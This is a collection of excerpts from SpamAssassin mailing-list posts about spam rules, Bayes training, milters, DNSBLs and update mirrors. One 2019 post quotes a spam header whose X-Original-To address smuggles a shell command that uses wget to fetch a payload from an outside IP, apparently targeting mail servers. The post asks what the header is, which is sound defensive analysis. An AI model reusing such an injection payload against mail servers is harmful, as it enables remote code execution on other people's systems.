Re: Catch a rejected message ?

2023-12-01 Thread Dave Funk
nse and then feeding the results of interpreting SA's evaluation of the message. That milter-reject status is the milter's responding to Postfix. So you need to look at the capabilities of your milter to customize its response for the particular message(s) in question. Dave On Fri, 1 Dec 2

Re: Really hard-to-filter spam

2023-08-02 Thread Dave Funk
use it. So if you -are- getting Bayes scores then that indicates that SA is using some database other than what you think it has. Now start manually training more messages (spam & ham). When you hit the 200 count threshold Bayes scores should start showing up in your logs. Good luck. -- Dave Fun

Re: authres missing when ran from spamass-milter

2023-05-31 Thread Dave Funk
the spamassassin 'glue' milter. Milter results are chained so any headers explicitly added by one milter are passed on to succeeding milters. If those headers are being generated by the MTA then it may not be possible for milters to see them without hacking the MTA itself. -- Dave Funk

Re: comparing sender domain against recipient domain

2023-05-12 Thread Dave Funk
n attempts using European character sets with letters that look like O or e to fake common domain names. I've hand coded rules to check for this stuff when frequently abused but I don't know of a programmatic algorithm to do it automagically. Dave -- Dave Funk University

Re: Strange findings debugging bayes results

2023-02-16 Thread Dave Wreski
Hi, Here's also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch

Re: Gmail confidential mode

2022-11-17 Thread Dave Warren
On 2022-10-16 10:38, Alex wrote: > What do you know about "Gmail confidential mode" emails? I'm starting to > see a few of these come in to users now, and not sure how to treat them. > They are sent through gmail, but require a one-time passcode sent to the >

metholdless URLs bypass DecodeShortURLs link shortner checking

2022-08-29 Thread Dave Funk
les. Is this an issue with the DecodeShortURLs plugin or with SA? Where would I find the most recent version of DecodeShortURLs plugin? Thanks, Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol

Re: Matching on missing To field?

2022-07-20 Thread Dave Funk
s none of Subject, From, To, Reply-To entries. IE a really malformed message. Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell

Intuit servers sending paypal phishes

2022-05-06 Thread Dave Wreski
Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160]) X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Best, Dave

Re: Add header, not beginning with X?

2022-02-14 Thread Dave Funk
st for your own messages then some kind of custom delivery filter (EG procmail) would be the way to go. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell

Re: Avoid processing upsteam trusted mail with X-Spam-Flag: YES?

2022-01-06 Thread Dave Warren
On 2022-01-06 11:13, Benny Pedersen wrote: On 2022-01-06 18:20, Grant Taylor wrote: Q:  Does the upstream MSA not do filtering of inbound messages from clients?  I would think that this filtering would cover messages originating from the upstream organization to the downstream organization.

Re: SPF_NONE scoring

2021-12-02 Thread Dave Warren
On 2021-11-30 12:24, Greg Troxel wrote: Lots of people think SPF is silly. And spammers spamming from a domain they control can even dkim/dmarc. Domain based reputation is an extremely powerful tool, but it is only useful when you know the actual sender of a message. The benefit isn't in

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

2021-11-16 Thread Dave Wreski
to use the much more complex 'find' utility. Or the old-school rpm: $ rpm -ql spamassassin|grep TxRep /usr/share/man/man3/Mail::SpamAssassin::Plugin::TxRep.3pm.gz /usr/share/perl5/vendor_perl/Mail/SpamAssassin/Plugin/TxRep.pm Dave Martin

Re: page.link spam

2021-10-31 Thread Dave Funk
secretadultnightclub.page.link but not just page.link Think of it like you would link shortener URLs (EG bit.ly). -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin

SA 3.4.6 add From:addr host to URIHOSTS list?

2021-10-18 Thread Dave Funk
In SA 3.4.1 the host value of From:addr was automagically added to the URIHOSTS list and thus exposed to URIBL lookups. SA 3.4.6 does not do that. Is there a configuration option to reactivate that feature? Thanks, Dave -- Dave Funk University of Iowa

Re: handle_user and connect to spamd failed

2021-10-18 Thread Dave Funk
Add the option "-D 127.0.0.1" in that spamass-milter OPTIONS. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 5

Re: handle_user and connect to spamd failed

2021-10-18 Thread Dave Funk
-helper-home-dir' option needs an '=' with no spaces, or use the -H -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include B

Re: elf signature for clamav

2021-09-26 Thread Dave Funk
score but meta with other things such as Bayes to jack up the score. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242

Re: Message-ID with IPv6 domain-literal

2021-09-21 Thread Dave Funk
.1.30]" is the representation of IPv4: 193.168.1.30 which is a Public IP address, thus that 'hit' is in error. This should be considered a parsing bug. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S

Re: An interesting bit of HTML from a spam

2021-09-12 Thread Dave Funk
t picking up hosts in URLs? -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better is not better, 'standard' is better. B{

Re: spamass-milter (sa daemon loads config different to shell ?)

2021-07-27 Thread Dave Funk
ass-milter specifically because of this issue. Writing a milter that directly talks the spamd protocol via a socket (local or network) is more work but safer and more efficient. (been there, done that, got the code to prove it). -- Dave Funk University of Iowa

Re: updates.spamassassin.org not resolving

2021-07-23 Thread Dave Warren
On 2021-07-23 06:54, Benny Pedersen wrote: On 2021-07-23 14:35, Kevin A. McGrail wrote: TL;DR: Everything looks good to me. +1 I think you are just doing DNS calls that are either invalid or look like you are trying to do discovery through recursion.  For example: dig -t txt

Re: SA 3.4.5 meta with RBL rules not working.

2021-07-19 Thread Dave Funk
rote: How about upgrading to latest 3.4.6? This release includes fixes for the following: - Fixed URIDNSBL not triggering meta rules On Mon, Jul 19, 2021 at 01:42:51AM -0500, Dave Funk wrote: I recently updated from SA 3.4.1 to 3.4.5 and noticed that a number of my "meta" rules quit wo

SA 3.4.5 meta with RBL rules not working.

2021-07-19 Thread Dave Funk
massassin -D" does not give any clues what's going wrong. Any suggestions about how to debug this? Thanks, Dave -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St.

Re: Email Phishing and Zloader: Such a Disappointment

2021-07-12 Thread Dave Funk
rules and heuristics/algorithms enabled. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better is n

Re: spamass.sock - No such file or directory

2021-06-28 Thread Dave Funk
Jun 26 09:26 spamass.sock > > or > > srw-rw  1   spamass-milter spamass-milter 0 Jun 26 09:26 spamass.sock > >/etc/group > spamass-milter:x:128:postfix > > thanks for any help -- Dave Funk

Re: Scan Attachment Content Using Spamassassin

2021-06-03 Thread Dave Funk
se a whole different tool that comes with that kind of capability built-in (EG ClamAV). -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin

Re: Scan Attachment Content Using Spamassassin

2021-06-03 Thread Dave Funk
to take whatever kinds of actions you want based on what components 'fired'. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA

Counting number of instances of a particular header

2021-05-03 Thread Dave Funk
characters but less than 150 I then tried: header L_MY_HEADER X-My-Header =~ /^.{5,200}/ Which would fire only once, even if there were 5 or more instances of the header. What am I doing wrong? How should I craft a rule to count the number of instances of that header? Thanks, Dave -- Dave Funk

Re: More fake order spam

2021-04-27 Thread Dave Wreski
e the brackets, so the rule matches/triggered. Regards, Dave

Re: More fake order spam

2021-04-27 Thread Dave Wreski
  _LOCAL_FAKE_ORDER_SUBJ + (__LOCAL_FAKE_ORDER_2 + __LOCAL_FAKE_ORDER_3 >= 1) score LOCAL_FAKE_ORDER 3.0 That's great, but probably doesn't have much longevity. You can also use the following for the presence of a header: header __LOCAL_FAKE_ORDER_2 exists:List-Id Regards, Dave

Re: More fake order spam

2021-04-27 Thread Dave Wreski
AS200484 Regards, Dave

Re: Spoofed amazon order email

2021-04-16 Thread Dave Wreski
ure you're using the KAM channel (as well as the regular sa-updates channel). https://mcgrail.com/template/kam.cf_channel Best, Dave

Re: ANN: ReturnPath rule renaming

2021-03-26 Thread Dave Wreski
r dealing with this. dave

Re: apache.org is blacklisted

2021-01-27 Thread Dave Wreski
-translator https://translate.google.com/translate?hl=en=auto=en=https%3A%2F%2Fspfbl.net%2Fen%2Fproject%2F Regards, Dave

Re: Error "cannot open bayes databases" lock failed: File exists

2021-01-20 Thread Dave Funk
s -la /var/spamassassin/bayesdb/bayes* (taken from the bayes_path parameter) should get you what you want. even better: ls -la /var/spamassassin/bayesdb/ (to see if there's any leftover lock files in that directory) -- Dave Funk University of Iowa College of E

Re: Emotet today..

2021-01-13 Thread Dave Wreski
Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent

Re: BCC Rule and Subject change for specific rule

2021-01-05 Thread Dave Funk
status/command that spamd returns to the milter for this kind of modification? If so the milters may need to be recoded to implement it. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S

Re: Bypass RBL checks for specific address

2020-12-23 Thread Dave Funk
s. (needed for "postmaster" messages). What version of sendmail are you using? -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa

Re: Bypass RBL checks for specific address

2020-12-23 Thread Dave Funk
ems as if the tests are still run, and it's just the score is artificially offset based on which setting is used. I'm wanting to not run RBL tests for the specific recipient email address. -- Grant. . . . unix || die -- Dave Funk University of Iowa Coll

Re: Scoring Based on IP Address

2020-12-17 Thread Dave Wreski
ceived =~ /192\.168\.240\.\d{1,3}/ body __BAD_IP_BODY /192\.168\.240\.\d{1,3}/ rawbody __BAD_IP_RAWBODY /192\.168\.240\.\d{1,3}/ meta MY_BAD_SENDER __BAD_IP_RCVD || __BAD_IP_BODY || __BAD_IP_RAWBODY score MY_BAD_SENDER 20 describe MY_BAD_SENDER Contains bad IP Regards, Dave

Re: adding AV scanning to working Postfix/SA system

2020-12-02 Thread Dave Funk
lamav.pm" # full L_CLAMAV eval:check_clamav() describe L_CLAMAV Clam AntiVirus detected a virus score L_CLAMAV 5 # header T__MY_CLAMAV X-Spam-Virus =~ /Yes/i header T__MY_CLAMAV_SANE X-Spam-Virus =~ /Yes.{1,50}Sanesecurity/i # -- Dave Funk Universit

Re: adding AV scanning to working Postfix/SA system

2020-12-02 Thread Dave Funk
rules to add points for various kinds of things detected or "meta"ed with other rules. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_adm

Re: adding AV scanning to working Postfix/SA system

2020-11-30 Thread Dave Wreski
. I would also be interested in newer/supported AV alternatives. Regards, Dave Where did you hear this? I was just informed it will continue until 2023 at least. The "Free" version is no longer available, apparently, but the "endpoint" product is still there for paying

Re: adding AV scanning to working Postfix/SA system

2020-11-24 Thread Dave Wreski
pported AV alternatives. Regards, Dave On 11/23/20 5:37 PM, Joe Acquisto-j4 wrote: So, beyond "experiences" any leads on generic "how to" guides that actually work in practice?   I've found a few, rather than chase geese, I'm sure some here have done similar things, even if

Re: amazonses.com doubble dkim sign

2020-11-09 Thread Dave Funk
signature is. There's nothing to prevent each system in the SMTP hand-off chain from adding their own signature, provided they do nothing to invalidate earlier signatures. More than two is unusual/overkill, but it's not uncommon to see two. -- Dave Funk University

Re: to: header is not in my domain

2020-10-20 Thread Dave Wreski
iling list, then otherwise adding points that would normally be overcome by a proper SPF record or Envelope From address, for example. You should submit a few of these emails to pastebin.com where we can analyze them more thoroughly for other patterns. Regards, Dave <mailto:anyaddr...@mydomain

Re: questions on spamassassin

2020-09-05 Thread Dave Funk
m rule if they don't like how that particular rule works. See: https://cwiki.apache.org/confluence/display/SPAMASSASSIN/WhereDoLocalSettingsGo Once all the rules are read and parsed spamassassin has an internal order to how specific rules get run. -- Dave Funk Universit

Re: Thanks to Guardian Digital & LinuxSecurity for the nice post about SpamAssassin's upcoming change

2020-07-23 Thread Dave Funk
. ;) This is the letter G brought to you by Oscar the grouch. -- Dave Funk University of Iowa College of Engineering 319/335-5751 FAX: 319/384-05491256 Seamans Center, 103 S Capitol St. Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527 #include Better

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-14 Thread Dave Goodrich
because they are racially charged is silly. BLM is not going to give you a big hurrah on twitter for your efforts. I can't stop it from happening, so be it. DAve - On Jul 14, 2020, at 9:15 AM, Kevin A. McGrail wrote: > Dave, > The goal of removing racially-charged la

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-14 Thread Dave Goodrich
of both are not important, it is culturally insensitive to use the name Apache if you are not a native American. To not go all the way with this would simply be wrong. DAve - On Jul 14, 2020, at 8:28 AM, Kevin A. McGrail wrote: > I think you are reading other people's take on things. Clea

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-14 Thread Dave Goodrich
or be on the wrong side of history' (sic) tells me this is not about a more clear and understandable naming convention. This is posturing and pandering. I am disappointed greatly. Very disappointed. DAve - On Jul 14, 2020, at 5:03 AM, Kevin A. McGrail wrote: > Marc and others about vot

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-10 Thread Dave Wreski
embarrassed by his failure to question the racist status quo of the world in which he had grown up. Regards, Dave -- Pedro

Re: score sender domains with 4+ chars in TLD?

2020-06-12 Thread Dave Funk
/update the data file, no need to restart spamd) and could create a custom scoring value based on the DNS data (EG 127.0.0.2 for really 'good' TLDs, 127.0.0.4 for 'so-so' and 127.0.0.8 for truly spammy names). -- Dave Funk University of Iowa College of Engineeri

Coronavirus domains

2020-03-17 Thread Dave Wreski
relating to protecting users from coronavirus they'd like to share? dave

Re: Spamassassin reporting

2019-12-05 Thread Dave Goodrich
That looks very familiar, and exactly what I am looking for. I can make that script work with our log files, thank you. DAve - On Dec 4, 2019, at 8:14 PM, Chris Pollock cpoll...@embarqmail.com wrote: > On Wed, 2019-12-04 at 11:22 -0500, Dave Goodrich wrote: >> Good morning, &g

Re: Spamassassin reporting

2019-12-05 Thread Dave Goodrich
Thank you, we will look at that for possibly other things as well. DAve - On Dec 4, 2019, at 2:30 PM, Giovanni Bechis giova...@paclan.it wrote: > On 12/4/19 5:22 PM, Dave Goodrich wrote: >> Good morning, >> >> Many years ago, in previous jobs, I used several s

Spamassassin reporting

2019-12-04 Thread Dave Goodrich
, but not useful. Can anyone recommend a ready to run OSS script, or set of scripts, for basic maillog stats concerning Spam? Just thought I would ask before I wrote something. Internet searching is not turning up anything for me. Thanks, DAve -- Dave Goodrich Information Technology City of Greenfield

Custom rule to please the Mayor

2019-11-21 Thread Dave Goodrich
correct, it would have been stopped. Even if only for this one account, I need a rule to check that the Mayor's display name matches the Mayor's email account and I am at a loss how to manage that with SA rule structure. Any thoughts on that or has anyone done something similar? DAve -- Dave

Re: MALFORMED_FREEMAIL

2019-11-01 Thread Dave Warren
In general it is the concept of sending from a particular domain in a format that the infrastructure on that domain will not send. A really easy to grasp concept: I know that example.com's mail server always adds a X-Yup-We-Sent-It: True header, so I will consider anything claiming to be

SpamAssassin 18th anniversary article

2019-10-24 Thread Dave Wreski
-celebrates-18-years-of-effectively-combating-spam-email We'd love to know what you think. Thanks, Dave

Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski
Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by

Re: SpamAssassin Scoring For MDAEMON_DNSBL

2019-05-26 Thread Dave Warren
On 2019-05-14 09:17, John Hardin wrote: On Tue, 14 May 2019, cyflhn wrote: It has happened many times that the emails from our server were identified as spam. I have checked the emails which were not identified as spam. But I found that the SpamAssassin Scoring For MDAEMON_DNSBL is quite

Re: Amazon continues to get tagged as spam

2019-04-02 Thread Dave Warren
On 2019-04-02 06:01, RW wrote: On Mon, 01 Apr 2019 20:14:13 -0400 Dave Warren wrote: 1.8 DKIM_ADSP_DISCARD No valid author signature, domain signs all mail and suggests discarding the rest This is a bit odd too, I don't see ADSP records on Amazon's various .com domains (although

Re: Amazon continues to get tagged as spam

2019-04-01 Thread Dave Warren
On Mon, Apr 1, 2019, at 17:11, @lbutlr wrote: > 3.5 BAYES_99 BODY: Bayes spam probability is 99 to 100% > [score: 1.] > 0.2 BAYES_999 BODY: Bayes spam probability is 99.9 to 100% > [score: 1.] These two are both a

Re: Filtering at border routers: Is it possible?

2019-03-25 Thread Dave Warren
On 2019-03-22 21:43, Grant Taylor wrote: On 3/22/19 7:01 PM, Dave Warren wrote: To me, the big one is this: It sets your users up for failure. If a user configures their client on a network that allows unrestricted port 25 access and later moves (temporarily or permanently) to a network

Re: Filtering at border routers: Is it possible?

2019-03-22 Thread Dave Warren
On 2019-03-22 18:37, Grant Taylor wrote: On 3/22/19 3:23 PM, Benny Pedersen wrote: you only need sasl auth You should do the SMTP Authentication across STARTTLS to protect credentials. do not enable sasl auth on port 25, if it lists AUTH on port 25 ehlo, you will need to remove  it in

Re: Filtering at border routers: Is it possible?

2019-03-22 Thread Dave Warren
On 2019-03-22 18:39, Grant Taylor wrote: On 3/22/19 3:29 PM, Benny Pedersen wrote: custommers wish for port 25 open relay ? Having unfettered access to send traffic to TCP port 25 is /not/ the same thing as an open relay. Especially if you are a host with your clients running self-managed

Re: more spam is getting through :-(

2019-03-20 Thread Dave Warren
On 2019-03-18 23:39, Duane Hill wrote: Hello Dave, Tuesday, March 19, 2019, 12:11:40 AM, you wrote: > On 2019-03-18 17:40, @lbutlr wrote: On 18 Mar 2019, at 13:59, James <bjloc...@lockie.ca> wrote: On 2019-03-17 5:43 p.m., @lbutlr wrote:

Re: more spam is getting through :-(

2019-03-18 Thread Dave Warren
On 2019-03-18 17:40, @lbutlr wrote: On 18 Mar 2019, at 13:59, James wrote: On 2019-03-17 5:43 p.m., @lbutlr wrote: On 17 Mar 2019, at 15:03, James wrote: I run sa-learn --ham on my inboxes. Your inboxes likely contain spam messages that haven't been caught, so training on inbox will

Re: more spam is getting through :-(

2019-03-18 Thread Dave Warren
On Sun, Mar 17, 2019, at 22:45, John Hardin wrote: > On Sun, 17 Mar 2019, James wrote: > > $ sudo sa-learn --dump magic > > 0.000 04665448 0 non-token data: nspam > > 0.000 0 51031938 0 non-token data: nham > > I'd generally expect those numbers to be

Re: Is it weird to worry I'm getting too little spam? (success of RBLs)

2019-01-26 Thread Dave Warren
In my experience, the right combination of DNSBLs are extremely effective, typically well into the 90% of delivery attempts can be rejected before the DATA command (and therefore before SpamAssassin) with a combination of DNSBLs, RFC validations (greet pause of 11 seconds, early talkers rejected),

Re: mysql 8 database problem

2018-12-08 Thread Dave Wreski
Any help is appreciated, thank you! Have you run mysql_upgrade after upgrading? I'd also consider changing to mariadb if it's supported by your distribution. Regards, Dave Best regards, Csaba

Re: FPs on FORGED_MUA_MOZILLA (for my own hand-typed messages from my latest-version Thunderbird)

2018-10-02 Thread Dave Warren
> On Oct 2, 2018, at 13:49, Bill Cole > wrote: > > On 2 Oct 2018, at 13:39, Matus UHLAR - fantomas wrote: > >>> On 2 Oct 2018, at 9:36, Rob McEwen wrote: SIDE NOTE: I don't think there was any domain my message that was blacklisted on URIBL - so I can't explain the "URIBL_BLOCKED",

Re: repeated sa-update problems

2018-09-20 Thread Dave Jones
and only fetches from it. possibility of fetching from multiple mirrors would help here. Dave, is secnap one of the mirrors using a CDN? I will have to check later if someone else can't check today.  I am at a customer location where I don't have good VPN connection out and will be traveling

Re: stackexchange.com in URIBL (false positive?)

2018-07-28 Thread Dave Wreski
, and listed for a reason. The default score for URIBL_BLACK is 1.7 with bayes. Why have you changed it? You can request that it be delisted here: https://admin.uribl.com/ Regards, Dave

Re: Just to lighten your day?

2018-05-03 Thread Dave Wreski
18.(c)" Being the open source advocates that we are here, I actually thought it was a reference to the "copyleft" license. https://en.wikipedia.org/wiki/All_rights_reversed Not to be confused with the Chemical Brothers song by the same name, lol. Best, Dave

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

2018-03-27 Thread Dave Wreski
is just a few dozen(?) lines of rules to tag file types within zip/rar/7z/arj/exe files. Perhaps because you're outright rejecting many of these file types already? Regards, Dave 3,110,729 total messages* since March 15th 112,477 spam blocked 2,071 total viruses found 8 Foxhole viruses found

Re: IADB whitelist - again

2018-03-05 Thread Dave Warren
On 2018-03-04 05:46, David Jones wrote: That's great.  It means you know what you are doing when you change the default threshold to less than 5.0.  In that case you need to change a lot of other scores down too including RCVD_IN_IADB_* and the KAM.cf rules probably score way too high for you

Re: From:name spoofing

2018-02-17 Thread Dave Warren
On 2018-02-17 01:11, Daniele Duca wrote: On 17/02/2018 00:41, John Hardin wrote: Not necessarily safe. If your MTA receives a message without a Message-ID, it is supposed to generate one. And if it does so, it will probably do so using your (recipient) domain... Isn't MID creation

Re: Email filtering theory and the definition of spam

2018-02-07 Thread Dave Warren
On Wed, Feb 7, 2018, at 15:52, Martin Gregorie wrote: > > Technically, you asked for the email and they have a valid opt-out > > process that will stop sending you email. Yes, the site has scummy > > practices but that is not spam by my definition. > > > Yes, under EU/UK that counts as spam

Re: Barracuda Reputation Block List (BRBL) removal from the SA ruleset

2018-02-06 Thread Dave Warren
On 2018-02-05 09:12, Benny Pedersen wrote: Kevin A. McGrail wrote on 2018-02-05 16:53: I don't think that will apply will it because it will be looking up something like 1.2.3.4.bb.barracuda.blah which isn't cached. the first query can make a query with very low ttl, so it would not be

***UNCHECKED*** Can't locate object method "trim_domain"

2018-01-26 Thread Dave Wreski
Hi, while learning an mbox on a recent 3.4.2 svn: # sa-learn --spam --progress --mbox junk-012618 28% [== ] 5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at

Re: Using Cloud AutoML as an AI for an Anti-spam filter ?

2018-01-23 Thread Dave Warren
On Tue, Jan 23, 2018, at 02:55, Zulma Pape wrote: > In other words, can we integrate the Cloud AutoML into our server's > spam filter and make it behave the same way Gmail behave ? In short, not without a *lot* of work. Gmail implements a lot more complexity, and they have a lot more data than

Re: NOTE: Warning to Abusers of Update Servers

2017-11-24 Thread Dave Warren
e http. We typically set new mirrors at the weight of 1 and then > you can let us know if we can bump it up.> Regards, > KAM > > On November 23, 2017 10:08:06 PM EST, Dave Warren > <d...@thedave.ca> wrote:>> On Thu, Nov 23, 2017, at 16:01, Kevin A. McGrail >

Re: NOTE: Warning to Abusers of Update Servers

2017-11-24 Thread Dave Warren
On Fri, Nov 24, 2017, at 09:45, RW wrote: > On Fri, 24 Nov 2017 08:23:21 -0700 > Dave wrote: > > >> It mostly shouldn't, but when I was supporting a mail server that > > >> included a SpamAssassin integration, we ran into a non-zero number > > >>

Re: NOTE: Warning to Abusers of Update Servers

2017-11-24 Thread Dave
My recollection is that something was eating the TXT results; but not the A records. Probably a PIX or something like that, it broke ESMTP pretty badly too. > On Nov 24, 2017, at 06:34, RW <rwmailli...@googlemail.com> wrote: > > On Thu, 23 Nov 2017 16:39:25 -0700 >

Re: NOTE: Warning to Abusers of Update Servers

2017-11-23 Thread Dave Warren
On Thu, Nov 23, 2017, at 16:01, Kevin A. McGrail wrote: > On 11/23/2017 6:31 PM, Dave Warren wrote: > > Would more mirrors be useful? I've got a ton of spare upstream > > bandwidth and am in the progress of setting up a few mirrors for other > > projects. > > >

Re: NOTE: Warning to Abusers of Update Servers

2017-11-23 Thread Dave Warren
On 2017-11-21 11:57, RW wrote: On Tue, 21 Nov 2017 08:55:34 -0600 David Jones wrote: You are correct. I haven't dug into the code to verify but it appears that 3.4.x sa-update does use the DNS TXT record to know when to download so it doesn't hurt anything to run this version hourly. By

Re: NOTE: Warning to Abusers of Update Servers

2017-11-23 Thread Dave Warren
Would more mirrors be useful? I've got a ton of spare upstream bandwidth and am in the progress of setting up a few mirrors for other projects. On 2017-11-21 10:47, Kevin A. McGrail wrote: My goal is to stop abuse without causing undue grief or fps. It may come to more draconian steps as you

Re: SA-Update not updating DB

2017-11-17 Thread Dave Wreski
nstall ${REV}.tar.gz +1 for sunday. I installed this now to my farm and will keep an eye on it thru weekend. +1 for Sunday here too. We've installed it all around and doing great so far. Thanks everyone for the amazing work. Thanks, Dave

Re: SA-Update not updating DB

2017-11-16 Thread Dave Wreski
environment variable first. Just copy the text including the REV=1815298 and paste on the command-line as root and it should work. Regards, Dave

Re: Blocking senders that are whitelisted

2017-10-04 Thread Dave Warren
On 2017-10-04 10:26, Ian Zimmerman wrote: On 2017-10-04 10:52, David Jones wrote: I bet this user signed up for this email somehow, possibly a while ago and has forgotten about doing so. So many times, when you register for accounts on websites, the check box to opt-in to a mailing list is

Re: SA 3.4.1 for Centos 7?

2017-07-26 Thread Dave Jones
On 07/26/2017 12:54 PM, David Jones wrote: On 07/26/2017 11:50 AM, John Hardin wrote: Can anyone recommend a 3.4.1 RPM for Centos 7 x86_64, or indicate when 3.4.1 will be part of the base for Centos 7 / RHEL? Currently it's 3.4.0 and that has some URI redirector issues. Thx. This worked

Re: Direct download link detection

2017-07-24 Thread Dave Warren
On Mon, Jul 24, 2017, at 15:00, Alex wrote: > Hi, > > We're currently experiencing a new spam campaign that involves some > text pertaining to invoicing then a link that immediately downloads a > Word macro file. > > http://sdeflores.com/PHJC579907/ > > What would be involved in following these

Re: "bout u" campaign

2017-07-13 Thread Dave Jones
On 07/13/2017 12:39 PM, Alex wrote: Hi, header RCVD_IN_SENDERSCORE_0_29 eval:check_rbl('senderscore0-lastexternal','score.senderscore.com.','^127\.0\.4\.([1-2]?[0-9])$') describe RCVD_IN_SENDERSCORE_0_29 Senderscore.org score of 0 to 29 score

Re: "bout u" campaign

2017-07-13 Thread Dave Jones
On 07/13/2017 12:03 PM, @lbutlr wrote: On Jul 12, 2017, at 8:18 PM, David Jones wrote: -2.2 RCVD_IN_SENDERSCORE_90_100 Senderscore.org score of 90 to 100 I haven’t seen that before (or not that I’ve noticed). Is it part of the base SA package or something that was added?

Re: updates.spamassassin.org gone?

2017-07-06 Thread Dave Warren
Did you read any of the thread? There shouldn't be an A record, and there literally can't be a (valid) PTR record. On Thu, Jul 6, 2017, at 15:48, jdow wrote: > No A or PTR record: > > ===8<--- > [jdow@thursday ~]$ dig updates.spamassassin.org ns1.apache.org all > > ; <<>> DiG
